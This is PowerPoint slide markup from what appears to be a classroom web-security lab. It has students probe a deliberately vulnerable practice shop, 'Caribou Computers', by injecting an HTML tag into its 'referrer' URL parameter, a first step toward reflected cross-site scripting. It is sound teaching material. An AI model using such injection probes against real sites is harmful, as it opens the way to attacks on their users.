              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is also an SQL script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evilsite.sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> import that through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Adminer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.  At the end you should have a table called: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite_comments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Once you do that you can point your browser at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://&lt;your sever IP&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_computers.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If you’re not logged in, go ahead an type in a username/password that you made for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ontario_computers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(both sites use the same database) otherwise just create a new account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3179011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Caribou Computers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D234F38-7258-4B8D-A5C4-CE26D9119EBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="535305" y="2514600"/>
            <a:ext cx="5718348" cy="2458889"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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6515944" y="2120900"/>
            <a:ext cx="4639736" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caribou computers is a new online shopping site which allows users to create accounts and examine their catalog.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It has recently started an affiliate program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>People who wish to earn credit with the site simply link to the Caribou Computers web site but pass a parameter on the URL ‘referrer’ and the unique id given to them by Caribou Computers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2210833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Caribou Computers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D234F38-7258-4B8D-A5C4-CE26D9119EB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35305" y="2578919"/>
            <a:ext cx="5718348" cy="2330251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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6515944" y="2120900"/>
            <a:ext cx="4639736" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caribou computers keeps their users informed about this program by placing a banner which tells users who owns the link that referred them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, when: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://172.16.1.242/caribou_computers.php?referrer=Daves%20Fish%20Market</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is passed in, the page looks like the image on the left.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2527567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Caribou Computers</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1097279" y="2120899"/>
            <a:ext cx="10058399" cy="1108076"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Like any good hacker our first act is to do some reconnaissance!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First, let’s look at the HTML makes up their web page.  Use your browsers “View Source” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>function to see this.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C8DB664-EECA-4635-B4E9-D9F06936CD0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="935353" y="3429000"/>
            <a:ext cx="10220325" cy="2763187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:softEdge rad="0"/>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="0" bIns="45720" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="925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rgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;&lt;HEAD&gt;&lt;style&gt; table { border-collapse: collapse; width: 100%; }</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, td { text-align: left; padding: 8px;}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tr:nth-child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(even)</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background-color: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Lightgreen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; }&lt;/style&gt;&lt;/HEAD&gt;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&lt;BODY&gt;&lt;h1 style='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>text-align:center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'&gt;Welcome to Caribou Computers&lt;/h1&gt;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&lt;div style="height:100px;border:2px solid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>black;text-align:center;position:relative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;"&gt;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&lt;span style='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>color:green</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;'&gt;Logged in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>as:testg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!&lt;/span&gt;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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/&gt;Referred by: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Daves</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Fish Market&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3217088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1C7D3-34E6-4BF7-823A-450648E92D0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="286603"/>
            <a:ext cx="10058400" cy="1450757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caribou Computers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D25F94D-D079-4870-A63A-44D386BD342D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097279" y="2120899"/>
            <a:ext cx="10058399" cy="1108076"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There’s nothing terribly strange but let's see if we can’t play with the URL a bit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try passing in: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://172.16.1.242/caribou_computers.php?referrer=&lt;b&gt;Daves%20Fish%20Market&lt;/b&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C8DB664-EECA-4635-B4E9-D9F06936CD0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="935353" y="3429000"/>
            <a:ext cx="10220325" cy="2763187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:softEdge rad="0"/>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="0" bIns="45720" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lst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rgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;&lt;HEAD&gt;&lt;style&gt; table { border-collapse: collapse; width: 100%; }</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, td { text-align: left; padding: 8px;}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tr:nth-child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(even)</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 background-color: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Lightgreen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
